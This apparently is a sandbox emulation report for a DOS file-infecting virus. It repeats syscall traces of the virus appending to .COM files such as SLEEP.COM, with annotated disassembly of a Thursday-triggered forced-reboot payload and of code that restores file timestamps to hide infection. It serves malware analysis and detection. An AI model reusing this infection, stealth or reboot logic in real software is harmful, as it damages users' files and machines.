2018-12-25T11:59:43.94338173Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.951873744Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.956679441Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.959012547Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.97051196Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.978681507Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.980681995Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.981837962Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.984228461Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.992425961Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.994111241Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.002861944Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.013961733Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.01829723Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.027541335Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.034779641Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.036758146Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.039791638Z 59 PC: 12ac0 | Change current directory
; Window around the return from INT 21h/2Ah (get date): a date check guarding a reboot payload, then the clean-up path.
; The run configuration shown on this page sets the emulated date to 1980-01-01 (a Tuesday), so this run takes
; the jne below and only the clean-up path appears in the trace.
2018-12-25T11:59:44.045054808Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4    ; AL = day of week from get-date (0 = Sunday), so 4 = Thursday
0x12ac8: jne 0x12ae0    ; not Thursday -> skip to the clean-up path
0x12aca: cmp dh, 0xe    ; DH = month (1-12) from the same call
0x12acd: ja 0x12ae0    ; never taken for a valid month, so the day-of-week test is the only effective condition (DL, the day, may have been intended - unconfirmed)
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax    ; DS = 0040h, the BIOS data area segment
0x12ad4: mov word ptr [0x72], 0    ; 0040:0072 is the BIOS reset flag; a value other than 1234h requests a cold boot
0x12ada: ljmp 0xffff:0    ; far jump to the reset entry point: the machine reboots
0x12adf: retf    ; not reached after the far jump
0x12ae0: mov ax, 0x2524    ; INT 21h AH=25h set interrupt vector, AL=24h = critical-error handler (the trace's 'Set random record number' label is INT 21h function 24h, not this vector)
0x12ae3: lds dx, ptr [bp + 0x446]    ; DS:DX = far pointer stored at [bp+0x446] (presumably the original vector read by the earlier get-interrupt-vector call - confirm)
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds    ; DS = CS again after lds changed it
0x12aeb: lea dx, word ptr [bp + 0x3c2]    ; DS:DX = path buffer (presumably the directory saved by the earlier get-current-directory call)
0x12aef: mov ah, 0x3b    ; AH=3Bh change current directory
0x12af1: int 0x21
0x12af3: mov dx, 0x80    ; offset 80h, the default DTA location in the PSP
0x12af6: call 0x12c4b    ; set-DTA stub (begins with mov ah, 0x1a); the trace logs it at PC 12c4f
0x12af9: cmp sp, 0x4b50    ; purpose not determinable from this window
2018-12-25T11:59:44.047654884Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.049073521Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.051781617Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6496,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:43.58721614Z 26 PC: 12c4f | Set disk transfer address
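2018-12-25T11:59:43.589318753Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36', i.e. vector 24h, the DOS critical-error handler; the 'Set random record number' label is the name of INT 21h function 24h, not of this vector)
2018-12-25T11:59:43.592720152Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36', i.e. vector 24h, the DOS critical-error handler; the 'Set random record number' label is the name of INT 21h function 24h, not of this vector)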
2018-12-25T11:59:43.593933798Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:43.597423536Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:43.604222943Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:43.610639239Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:43.617732062Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:43.62542296Z 62 PC: 12b51 | Close file
2018-12-25T11:59:43.627639641Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:43.64813812Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.656393745Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:43.663707238Z 66 PC: 12c4a | Move file pointer
; Window around the return from INT 21h/2Ch (get time): end of the per-file write path, then two small DOS helper stubs.
; Defender note: after writing, the code appears to put back the file's date/time and attributes, so mtime and
; attribute bits are not reliable change indicators here; compare file size and content hash instead.
2018-12-25T11:59:43.665293005Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0    ; DH = seconds returned by get-time
0x12c1e: je 0x12c17    ; seconds == 0 -> back to 0x12c17 (outside this window; presumably retries until non-zero)
0x12c20: mov byte ptr [bp + 0x3a5], dh    ; store the non-zero seconds byte (use not visible here; possibly a per-copy key - confirm in 0x12c9d)
0x12c24: call 0x12c9d    ; routine not shown; the trace's 675-byte write (PC 12cf9) happens inside it
0x12c27: mov ax, 0x5701    ; INT 21h AH=57h, AL=01h: set file date and time
0x12c2a: mov cx, word ptr [bp + 0x418]    ; CX = time word read from [bp+0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]    ; DX = date word (0x417/0x418/0x41a match attr/time/date of a find-file DTA at bp+0x402 - assumption, confirm)
0x12c32: int 0x21
0x12c34: mov ah, 0x3e    ; AH=3Eh: close file (handle presumably still in BX)
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]    ; CX = attribute byte read from [bp+0x417], zero-extended
0x12c3e: call 0x12c5a    ; routine not shown; the trace logs INT 21h/43h (file attributes) at PC 12c63 right after
0x12c41: ret
0x12c42: mov ah, 0x42    ; helper: AH=42h move file pointer; AL (origin) is left as set by the caller
0x12c44: xor cx, cx
0x12c46: xor dx, dx    ; CX:DX = offset 0
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a    ; helper start: AH=1Ah set disk transfer address (rest of the stub is past this window)
2018-12-25T11:59:43.668431917Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:43.677981363Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:43.679373765Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.688007561Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.69892765Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.702584046Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.710465256Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.717983793Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.719849057Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.730943617Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.739566625Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.743063878Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.744925624Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.753643282Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.762839281Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.764579565Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.773708227Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.784802639Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.787619235Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.795002924Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.802325024Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.804243155Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.81535087Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.823161257Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.826525413Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.828361529Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.832413322Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.842313677Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.844052654Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.854259153Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.865136103Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.86805068Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.875833595Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.88309614Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.885233856Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.897008376Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.910447933Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.918331684Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.920528819Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.923735096Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.932946498Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.934976661Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.944496925Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.955680669Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.958899433Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.967742212Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.974756959Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.976849693Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.982675989Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.988161358Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.991485431Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.993507906Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.996196818Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.008029043Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.0096614Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.010985235Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.015178072Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.022639326Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.031189354Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.038792581Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.041125804Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.05981449Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.067514814Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.070952466Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.077189171Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.080081782Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.090130015Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.092753547Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.10203577Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.113487701Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.117461952Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.125134459Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.132727589Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.136273487Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.147795271Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.156160984Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.160703797Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.163280394Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.166505146Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.176268322Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.179509129Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.186646449Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.196861962Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.201091396Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.208872676Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.216390209Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.219138899Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.222359022Z 59 PC: 12ac0 | Change current directory
; Window around the return from INT 21h/2Ah (get date): a date check guarding a reboot payload, then the clean-up path.
; The run configuration shown on this page sets the emulated date to 1980-01-01 (a Tuesday), so this run takes
; the jne below and only the clean-up path appears in the trace.
2018-12-25T11:59:44.228098901Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4    ; AL = day of week from get-date (0 = Sunday), so 4 = Thursday
0x12ac8: jne 0x12ae0    ; not Thursday -> skip to the clean-up path
0x12aca: cmp dh, 0xe    ; DH = month (1-12) from the same call
0x12acd: ja 0x12ae0    ; never taken for a valid month, so the day-of-week test is the only effective condition (DL, the day, may have been intended - unconfirmed)
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax    ; DS = 0040h, the BIOS data area segment
0x12ad4: mov word ptr [0x72], 0    ; 0040:0072 is the BIOS reset flag; a value other than 1234h requests a cold boot
0x12ada: ljmp 0xffff:0    ; far jump to the reset entry point: the machine reboots
0x12adf: retf    ; not reached after the far jump
0x12ae0: mov ax, 0x2524    ; INT 21h AH=25h set interrupt vector, AL=24h = critical-error handler (the trace's 'Set random record number' label is INT 21h function 24h, not this vector)
0x12ae3: lds dx, ptr [bp + 0x446]    ; DS:DX = far pointer stored at [bp+0x446] (presumably the original vector read by the earlier get-interrupt-vector call - confirm)
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds    ; DS = CS again after lds changed it
0x12aeb: lea dx, word ptr [bp + 0x3c2]    ; DS:DX = path buffer (presumably the directory saved by the earlier get-current-directory call)
0x12aef: mov ah, 0x3b    ; AH=3Bh change current directory
0x12af1: int 0x21
0x12af3: mov dx, 0x80    ; offset 80h, the default DTA location in the PSP
0x12af6: call 0x12c4b    ; set-DTA stub (begins with mov ah, 0x1a); the trace logs it at PC 12c4f
0x12af9: cmp sp, 0x4b50    ; purpose not determinable from this window
2018-12-25T11:59:44.231463936Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.233180777Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.235552486Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6496,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:43.650962671Z 26 PC: 12c4f | Set disk transfer address
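2018-12-25T11:59:43.652609396Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36', i.e. vector 24h, the DOS critical-error handler; the 'Set random record number' label is the name of INT 21h function 24h, not of this vector)
2018-12-25T11:59:43.654276087Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36', i.e. vector 24h, the DOS critical-error handler; the 'Set random record number' label is the name of INT 21h function 24h, not of this vector)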
2018-12-25T11:59:43.655620559Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:43.659290882Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:43.66436399Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:43.671293713Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:43.680997427Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:43.692507722Z 62 PC: 12b51 | Close file
2018-12-25T11:59:43.694358837Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:43.710221606Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.71715423Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:43.720009907Z 66 PC: 12c4a | Move file pointer
; Window around the return from INT 21h/2Ch (get time): end of the per-file write path, then two small DOS helper stubs.
; Defender note: after writing, the code appears to put back the file's date/time and attributes, so mtime and
; attribute bits are not reliable change indicators here; compare file size and content hash instead.
2018-12-25T11:59:43.721376979Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0    ; DH = seconds returned by get-time
0x12c1e: je 0x12c17    ; seconds == 0 -> back to 0x12c17 (outside this window; presumably retries until non-zero)
0x12c20: mov byte ptr [bp + 0x3a5], dh    ; store the non-zero seconds byte (use not visible here; possibly a per-copy key - confirm in 0x12c9d)
0x12c24: call 0x12c9d    ; routine not shown; the trace's 675-byte write (PC 12cf9) happens inside it
0x12c27: mov ax, 0x5701    ; INT 21h AH=57h, AL=01h: set file date and time
0x12c2a: mov cx, word ptr [bp + 0x418]    ; CX = time word read from [bp+0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]    ; DX = date word (0x417/0x418/0x41a match attr/time/date of a find-file DTA at bp+0x402 - assumption, confirm)
0x12c32: int 0x21
0x12c34: mov ah, 0x3e    ; AH=3Eh: close file (handle presumably still in BX)
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]    ; CX = attribute byte read from [bp+0x417], zero-extended
0x12c3e: call 0x12c5a    ; routine not shown; the trace logs INT 21h/43h (file attributes) at PC 12c63 right after
0x12c41: ret
0x12c42: mov ah, 0x42    ; helper: AH=42h move file pointer; AL (origin) is left as set by the caller
0x12c44: xor cx, cx
0x12c46: xor dx, dx    ; CX:DX = offset 0
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a    ; helper start: AH=1Ah set disk transfer address (rest of the stub is past this window)
2018-12-25T11:59:43.724297871Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:43.733198052Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:43.735108023Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.743537336Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.7533622Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.755952643Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.7634042Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.770650504Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.772871657Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.784144486Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.790766103Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.793491856Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.795014971Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.797670778Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.805924904Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.807586637Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.815620245Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.825345988Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.828270192Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.840574175Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.847115671Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.84943071Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.859839794Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.866556386Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.869738107Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.871799485Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.874462794Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.883029378Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.885262655Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.894508427Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.904809933Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.908424737Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.914713804Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.9210388Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.923591538Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.93358332Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.940270298Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.944214149Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.94580114Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.948465915Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.957872311Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.959663428Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.967409015Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.977779929Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.980923454Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.987803498Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.996095931Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.998396958Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.002863061Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.007852582Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.010532929Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.011939301Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.014731172Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.02563895Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.026854056Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.02922497Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.034132268Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.036582377Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.042977637Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.05002386Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.051790706Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.061576519Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.07074522Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.074702013Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.076212824Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.079452372Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.088644332Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.090665176Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.099537112Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.109412816Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.112226397Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.124184505Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.131142576Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.132911555Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.143489748Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.150001606Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.152666528Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.154950088Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.157641031Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.166422484Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.1687329Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.176456545Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.18618766Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.189991427Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.196898854Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.20349196Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.20620192Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.209089646Z 59 PC: 12ac0 | Change current directory
; Window around the return from INT 21h/2Ah (get date): a date check guarding a reboot payload, then the clean-up path.
; The run configuration shown on this page sets the emulated date to 1980-01-01 (a Tuesday), so this run takes
; the jne below and only the clean-up path appears in the trace.
2018-12-25T11:59:44.213499443Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4    ; AL = day of week from get-date (0 = Sunday), so 4 = Thursday
0x12ac8: jne 0x12ae0    ; not Thursday -> skip to the clean-up path
0x12aca: cmp dh, 0xe    ; DH = month (1-12) from the same call
0x12acd: ja 0x12ae0    ; never taken for a valid month, so the day-of-week test is the only effective condition (DL, the day, may have been intended - unconfirmed)
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax    ; DS = 0040h, the BIOS data area segment
0x12ad4: mov word ptr [0x72], 0    ; 0040:0072 is the BIOS reset flag; a value other than 1234h requests a cold boot
0x12ada: ljmp 0xffff:0    ; far jump to the reset entry point: the machine reboots
0x12adf: retf    ; not reached after the far jump
0x12ae0: mov ax, 0x2524    ; INT 21h AH=25h set interrupt vector, AL=24h = critical-error handler (the trace's 'Set random record number' label is INT 21h function 24h, not this vector)
0x12ae3: lds dx, ptr [bp + 0x446]    ; DS:DX = far pointer stored at [bp+0x446] (presumably the original vector read by the earlier get-interrupt-vector call - confirm)
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds    ; DS = CS again after lds changed it
0x12aeb: lea dx, word ptr [bp + 0x3c2]    ; DS:DX = path buffer (presumably the directory saved by the earlier get-current-directory call)
0x12aef: mov ah, 0x3b    ; AH=3Bh change current directory
0x12af1: int 0x21
0x12af3: mov dx, 0x80    ; offset 80h, the default DTA location in the PSP
0x12af6: call 0x12c4b    ; set-DTA stub (begins with mov ah, 0x1a); the trace logs it at PC 12c4f
0x12af9: cmp sp, 0x4b50    ; purpose not determinable from this window
2018-12-25T11:59:44.216484938Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.217990259Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.22008194Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6496,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:43.676834379Z 26 PC: 12c4f | Set disk transfer address
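2018-12-25T11:59:43.678662329Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36', i.e. vector 24h, the DOS critical-error handler; the 'Set random record number' label is the name of INT 21h function 24h, not of this vector)
2018-12-25T11:59:43.680617483Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36', i.e. vector 24h, the DOS critical-error handler; the 'Set random record number' label is the name of INT 21h function 24h, not of this vector)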
2018-12-25T11:59:43.682047507Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:43.685505086Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:43.693348309Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:43.700390607Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:43.708115283Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:43.716837228Z 62 PC: 12b51 | Close file
2018-12-25T11:59:43.719308109Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:43.739755013Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.747976524Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:43.755850195Z 66 PC: 12c4a | Move file pointer
; Window around the return from INT 21h/2Ch (get time): end of the per-file write path, then two small DOS helper stubs.
; Defender note: after writing, the code appears to put back the file's date/time and attributes, so mtime and
